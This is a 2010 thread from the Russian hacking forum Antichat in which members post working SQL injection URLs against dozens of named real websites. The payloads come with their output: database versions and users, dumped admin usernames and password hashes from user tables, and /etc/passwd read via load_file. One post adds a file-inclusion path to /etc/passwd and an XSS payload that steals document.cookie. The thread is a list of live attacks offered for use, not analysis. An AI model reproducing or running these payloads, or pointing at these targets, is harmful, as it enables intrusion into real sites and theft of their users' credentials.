ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12181  
Старый 17.05.2010, 15:32
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.concellotui.org/php/noticias.php?id=688+union+select+1,2,3,4,version(),6,7,8,9/*
Database Version: 4.1.22
Database name: qai608
User name: qai608@217.76.131.103

-----------------------------------------------------------------------------------------------------------------

Код:
http://www.christianword.org/php/default.php?page_id=view_testimony&id=-499+union+select+1,version(),3,4,5--
Database Version: 5.0.90-community
Database name: mobil0_cwm
User name: mobil0_server1@localhost

----------------------------------------------------------------------------------------------------------------------------

Код:
http://www.kummarashalivahana.org/php/greatprofiles_details.php?id=-51+union+select+1,version(),3,4,5,6,7,8--
5.0.67.d7-ourdelta-log

----------------------------------------------------------------------------------------------------------------------------

Код:
http://www.wolfdog.org/php/modules.php?op=modload&name=WolfdogShows&newlang=eng&file=successes&id=-8372+union+select+version(),2--
Database Version: 5.0.87-b20-log
Database name: wolfdog_dbase
User name: wolfdog_user@s1.hostpark.pl

-----------------------------------------------------------------------------------------------------------------------------

Код:
http://www.timothysmithnetwork.org/courseDetails.php?id=-1652+union+select+1,2,3,4,5,version(),7,8,9,0,11,12,13,14,15,16,17,18--
Database Version: 5.0.67-log
Database name: timothy_smith_network
User name: timothy_smith@win.beza.net

Последний раз редактировалось Skofield; 17.05.2010 в 17:25..
 
Ответить с цитированием

  #12182  
Старый 17.05.2010, 16:48
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

http://www.promd.us/news.php?cat=-2+/*!union*/+select+1,CONCAT(userId,0x7c,fName,0x7c,lName,0x7c ,0x7c,userName,0x7c,password,0x7c,email),3,4+from+ promd_admin_users+LIMIT+0,1--&id=7
 
Ответить с цитированием

  #12183  
Старый 17.05.2010, 17:09
Аватар для SENIA
SENIA
Постоянный
Регистрация: 22.11.2008
Сообщений: 344
Провел на форуме:
3863128

Репутация: 570
Отправить сообщение для SENIA с помощью ICQ
По умолчанию

Код:
http://propool.info/articles.php?id=-37+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,6,7+from+vh04971.bb_users+limit+3,1--
Код:
http://art.specialradio.ru/print.php?id=-247+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9+from+artbaze_specialradio_ru.phpbb_users+limit+1,1--
Код:
http://www.sea-angels.ru/index.php?id=-51+union+select+1,concat_ws(0x3a,converge_id,converge_pass_hash,converge_pass_salt),3,4,5,6,7,8+from+u46830.fib_sa_members_converge--
Код:
http://vn.ru/index.php?id=-100301+union+select+1,concat_ws(0x3a,name,member_login_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+sibkray_site.ibf_members--
Код:
http://www.mwe-design.ru/view.php?id=-1978+union+select+1,2,3,4,5,concat_ws(0x3a,user_login,user_pass),7,8,9,10,11+from+u56665_belosn.wp_users--
Код:
http://www.gisa.ru/info_see.php?id=-1978+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+information_schema.tables+limit+61,1--
Код:
http://megaspravka.ru/viewcat.php?id=-474+union+select+1,concat_ws%280x3a,username,userpass%29,3,4,5,6,7+from+nakavkaz_megaspravka.cat_users--
Код:
http://www.ruscargoservice.ru/auto_info.php?id=-474+UNION+SELECT+1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+u45320.phpbb_users+limit+1,1--

Последний раз редактировалось SENIA; 17.05.2010 в 17:51..
 
Ответить с цитированием

  #12184  
Старый 17.05.2010, 17:24
Аватар для ..::TROYAN::..
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.emeraldshoresrealty.net/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://www.listahouserealty.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://www.homesbytaber.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://heidelberg-housing.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://empaash.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://www.barnards-svg.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://gigisexclusive.co.za/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://www.valuezoneltd.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://www.french-property-homes.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://www.talkofnc.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://www.myholidaysintenerife.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://rd4global.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://wirevip.com/joomla_catalog/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
http://www.rieltgarant.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
 
Ответить с цитированием

  #12185  
Старый 17.05.2010, 17:26
Аватар для Keltos
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Код:
http://www.almenhaj.net/Report.php?linkid=-6878+union+select+1,2,3,4,5,concat_ws(0x3a%20,user(),database(),version()),7,8,9,10,11,12,13--
User: abuzooz@boscgi1903.eigbox.net
Version: 5.0.45-log
Database: future
 
Ответить с цитированием

  #12186  
Старый 17.05.2010, 17:53
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

SQL Inj

http://iep.univ-lille2.fr/presentation/consult.php?num=-121+union+select+1,2,3,concat(user,char(58),passwo rd),5,6,7,8+from+mysql.user&type=agenda

+Include

http://iep.univ-lille2.fr/lib/tele.php?chemin=../../../../../../../../etc/passwd

+XSS

http://iep.univ-lille2.fr/presentation/consult.php?num=-121+union+select+1,2,3,<img src=https://forum.antichat.ru/antichat/pic/logo.gif></img><script>alert(document.cookie)</script>,5,6,7,8+from+mysql.user&type=agenda

PR-7

*******
 
Ответить с цитированием

  #12187  
Старый 17.05.2010, 19:05
Аватар для aka_zver
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.lahdenmuseot.fi
ТИЦ: 20
PR: 4
Пример запроса:
Код:
http://www.lahdenmuseot.fi/main.php?id=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),1,63),+floor(rand(0)*2)))--+
version - 5.0.77
user - root@localhost
database - mg:lahdenmuseot
os - redhat-linux-gnu

============================================

Сайт: http://beta.weetwaar.com
ТИЦ: 0
PR: ?
Пример запроса:
Код:
http://beta.weetwaar.com/f.php?ID=950+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - weetwaarco_u@localhost
database - weetwaarco_splace
os - pc-linux-gnu

============================================

Сайт: http://www.weetwaar.nl
ТИЦ: 0
PR: 2
Пример запроса:
Код:
http://www.weetwaar.nl/module.php?ID=38296+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - weetwaar@host073.procolix.com
database - weetwaar_nl
os - pc-linux-gnu

============================================

Сайт: http://www.centres.exeter.ac.uk
ТИЦ: 20
PR: 3
Пример запроса:
Код:
http://centres.exeter.ac.uk/cls/programmes/module.php?id=-300+union+select+1,2,3,4,5,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+
version - 5.0.45-log
user - sobeadm@snowwhite.ex.ac.uk
database - sobe
os - redhat-linux-gnu

============================================

Сайт: http://www.beoordeelmijnrecruiter.nl
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.beoordeelmijnrecruiter.nl/module.php?ID=100455+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),1,63),+floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - bmr@localhost
database - bmr
os - pc-linux-gnu

Последний раз редактировалось aka_zver; 17.05.2010 в 19:17..
 
Ответить с цитированием

  #12188  
Старый 17.05.2010, 19:48
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.nordenhake.com/php/artistsExhibitions.php?id=-99'+union+select+1,2,3,4,5,6,7,8,version(),0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97/*
Database Version: 5.0.45-log
Database name: nordenhake_com
User name: norden_com@n3874@s73.loopia.se

----------------------------------------------------------------------------------------------------------------------------

Код:
http://www.artistsincanada.com/php/article.php?id=-339+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13--
Database Version: 5.0.90-community
Database name: artistsincanada_com
User name: artists@localhost

-----------------------------------------------------------------------------------------------------------------------------

Код:
http://www.detroitgospel.com/Php/newsdisplay.php?id=-151+union+select+1,version(),3,4,5,6,7,8,9,10--
Database Version: 5.0.83
Database name: detroi1_newsncalendar
User name: detroi1_select@216.157.150.192

-----------------------------------------------------------------------------------------------------------------------------

Код:
http://www.peterrake.com/php/display_model.php?id=-78+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,0,11,12,13+from+mysql.user--
Database Version: 5.0.51a-24+lenny3
Database name: peterrake
User name: www@localhost

Последний раз редактировалось Skofield; 17.05.2010 в 20:38..
 
Ответить с цитированием

  #12189  
Старый 17.05.2010, 21:16
Аватар для aka_zver
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.lindespelers.nl
ТИЦ: 0
PR: 2
Пример запроса:
Код:
http://www.lindespelers.nl/module.php?ID=214+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - lindespele_u@localhost
database - lindespele_splace
os - pc-linux-gnu

============================================

Сайт: http://www.et2000.nl
ТИЦ: 0
PR: 2
Пример запроса:
Код:
http://www.et2000.nl/module.php?ID=974+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - et2000_splace@localhost
database - et2000_splace
os - pc-linux-gnu

============================================

Сайт: http://www.oranjenassau.net
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.oranjenassau.net/module.php?aktie=view&ID=44447+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - nassau_splace@localhost
database - nassau_splace
os - pc-linux-gnu

============================================

Сайт: http://www.splace.nl
ТИЦ: 0
PR: 4
Пример запроса:
Код:
http://www.splace.nl/module.php?moduleID=1&ID=408+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - soetendal_splace@localhost
database - soetendal_splace
os - pc-linux-gnu

============================================

Сайт: http://www.ifs.tu-braunschweig.de
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.ifs.tu-braunschweig.de/module.php?id=49&action=download&fileid=12'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.45
user - de@localhost
database - de
os - redhat-linux-gnu

============================================

Сайт: http://thailengo.com
ТИЦ: 0
PR: 0
Примеры запросов:
Код:
http://thailengo.com/module.php?id=-1+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+  

http://thailengo.com/module.php?id=-1+union+select+1,2,group_concat(0x0b,user,0x3a,pass)+from+users--+
version - 5.0.51a-24+lenny2+spu1
user - thai@localhost
database - thai
os - debian-linux-gnu

============================================

Сайт: http://www.iai-award.org
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.iai-award.org/english/module.php?id=-58+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,table_name),5,6,7,8+from+information_schema.tables--+
version - 5.0.90-community
user - mille44_iaiaward@localhost
database - mille44_iaiaward
os - pc-linux-gnu
 
Ответить с цитированием

  #12190  
Старый 17.05.2010, 23:04
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.chowk.com/site/articles/index.php?id=-4669+union+select+1,2,3,4,version(),6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22--
Database Version: 5.0.90-community
Database name: CHOWK
User name: chdbu@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ